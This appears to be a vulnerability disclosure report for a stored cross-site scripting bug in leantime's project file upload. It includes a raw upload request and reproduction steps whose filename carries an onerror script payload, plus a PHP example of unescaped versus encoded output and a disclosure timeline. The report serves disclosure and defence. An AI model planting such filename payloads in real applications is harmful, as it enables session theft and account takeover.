Cross-site Scripting (XSS) - Stored in leantime/leantime

Valid

Reported on Nov 1st 2021

Description

Stored XSS via the filename of an uploaded file: the name is stored with the file and later rendered into the project's file list without HTML encoding.

Proof of Concept

// PoC.req
POST /leantime/public//projects/showProject/3 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:94.0) Gecko/20100101 Firefox/94.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------4148739525669256752671116272
Content-Length: 71553
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/leantime/public//projects/showProject/3
Cookie: 127001corebos=id8sv6vt012aj21319s5q16lp8; PHPSESSID=tjrsiun42kolr8imto0cv5qvpd; XSRF-TOKEN=eyJpdiI6IlJtckQrZ0FsM0ZDaFppZWNhZHhUNEE9PSIsInZhbHVlIjoiMm52ODQwMmlnTDBaU2RQelRoMWk3elBZdVlERS9UUVdOL2NBb24yVzJlTEl4cTNWejdkYUt0R1NPWlRIZDJrQk40dVdQM3BwbDRNenhmRWRGdWRPV1VuK2l6b251Tm1UVTJKR2cxcHJYV3d3ZmpuMHYvQU1CZ1BQNGtyWkJnRVMiLCJtYWMiOiJhZTlmOGVlYTNjODYxYjQ2ZmM1YjNlMWVhNTg4MzJhYTU1YmM2NzJhNjIwZjlhYjgxZTU1NmNmMDhiOGNmZGM3IiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Im9qYWZQcVpJZTF2QklNSjVMeHpFaXc9PSIsInZhbHVlIjoicTRxSndoNDdpRjBuYWxFVklaeFoxbEMvOFI2NW0zWExJcE81cDVBK1pkY3dXZEhNY1hXLzN5R0djelJURzA0bElWeC9zN1drQUlUUWZJaHN6eDNER1FDa3ZXdGZmSkJpWDNrN2lMMzV6Z2o2MmpMUGFpV0w3R01YM1FlbWVHeHgiLCJtYWMiOiJmYjFjNGE1YzM1ZDUwOWNiYWM2ZDQwYzVhMDMzY2IxZDRjNDk4NGNhODA2ZDRmZDZiMGJmMDlhMDMxYjM1YjFiIiwidGFnIjoiIn0%3D; sid=cecedc4236bbfb8d968f5370f8a42324fbb3ea99-89b8102536c949c0f917e83121e7b36ff776c8ef
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="file"; filename="Sun'><img src=x onerror=alert(1)>set.jpg"
Content-Type: image/jpeg

[binary JPEG file contents omitted; the image data itself is irrelevant, only the filename in Content-Disposition matters]

-----------------------------4148739525669256752671116272
Content-Disposition: form-data; name="upload"

Upload
-----------------------------4148739525669256752671116272--

Steps to Reproduce

Create a file with a name like: test'><img src=x onerror=alert(1)>xss.jpg

Go to Project Settings, choose a project, and under Files select the file and upload it.

The XSS triggers as soon as the upload succeeds, because the stored filename is echoed into the page unescaped.
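The root cause is output encoding, not the upload itself: a filename that contains markup is harmless in storage and only becomes a problem when a template prints it into HTML verbatim. The following is an added example, not leantime's code and not the change made in the fix commit; the file-list markup and the function names are assumptions. It contrasts an unescaped echo of a filename with a properly encoded one and adds a conservative upload-time sanitizer as defence in depth, using the filename from the report above as constructed sample input.

```php
<?php
// Added example (not leantime's own code). The markup and function names
// below are assumptions made for illustration.

// Constructed sample input: the payload-style filename from the report.
const SAMPLE_FILENAME = "test'><img src=x onerror=alert(1)>xss.jpg";

// Vulnerable pattern: the stored filename is concatenated into HTML as-is.
// The leading "'>" closes the single-quoted attribute and the tag, so the
// browser parses the <img> element and runs its onerror handler.
function renderFileRowVulnerable(string $filename): string
{
    return "<li><a href='/files/get?name=" . $filename . "' title='" . $filename . "'>"
        . $filename . "</a></li>";
}

// Hardened pattern: encode at the point of output for the context used.
// ENT_QUOTES is essential here because the attributes are single-quoted;
// htmlspecialchars() without it leaves ' untouched. The URL component gets
// rawurlencode() instead, since it lives in a different context.
function renderFileRowSafe(string $filename): string
{
    $html = htmlspecialchars($filename, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
    $url  = rawurlencode($filename);
    return "<li><a href='/files/get?name=" . $url . "' title='" . $html . "'>"
        . $html . "</a></li>";
}

// Defence in depth at upload time: drop any path component and reduce the
// name to a conservative character set, so a forgotten escape in some other
// template cannot turn a stored name into markup. This does not replace
// output encoding; it limits the blast radius when encoding is missed.
function sanitizeUploadName(string $filename): string
{
    $base  = basename($filename);
    $clean = preg_replace('/[^A-Za-z0-9._-]/', '_', $base);
    // Reject empty or dot-only results (".", "..") which are not usable names.
    if ($clean === '' || trim($clean, '.') === '') {
        $clean = 'upload';
    }
    return substr($clean, 0, 255);
}

echo "Vulnerable: " . renderFileRowVulnerable(SAMPLE_FILENAME) . PHP_EOL;
echo "Escaped:    " . renderFileRowSafe(SAMPLE_FILENAME) . PHP_EOL;
echo "Sanitized:  " . sanitizeUploadName(SAMPLE_FILENAME) . PHP_EOL;
```

Running this prints the raw row, in which the `<img>` tag survives intact, followed by the encoded row, where `'` becomes `&#039;` and `<`/`>` become `&lt;`/`&gt;`, so the browser shows the filename as text. When reviewing a template for this bug class, check every place a user-controlled string lands and match the encoder to the context (HTML body, quoted attribute, URL, JavaScript); the single-quote case is the one most often missed.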

Impact

This vulnerability has the potential to steal a user's cookie and gain unauthorized access to that user's account through the stolen cookie.

We have contacted a member of the leantime team and are waiting to hear back 2 years ago
We have sent a follow up to the leantime team. We will try again in 7 days. 2 years ago
We have sent a second follow up to the leantime team. We will try again in 10 days. 2 years ago
lethanhphuc submitted a 2 years ago
Marcel Folaron validated this vulnerability 2 years ago
lethanhphuc has been awarded the disclosure bounty
The fix bounty is now up for grabs
Marcel Folaron marked this as fixed with commit 9552c5 2 years ago
lethanhphuc has been awarded the fix bounty
This vulnerability will not receive a CVE
showProject.tpl.php#L104 has been validated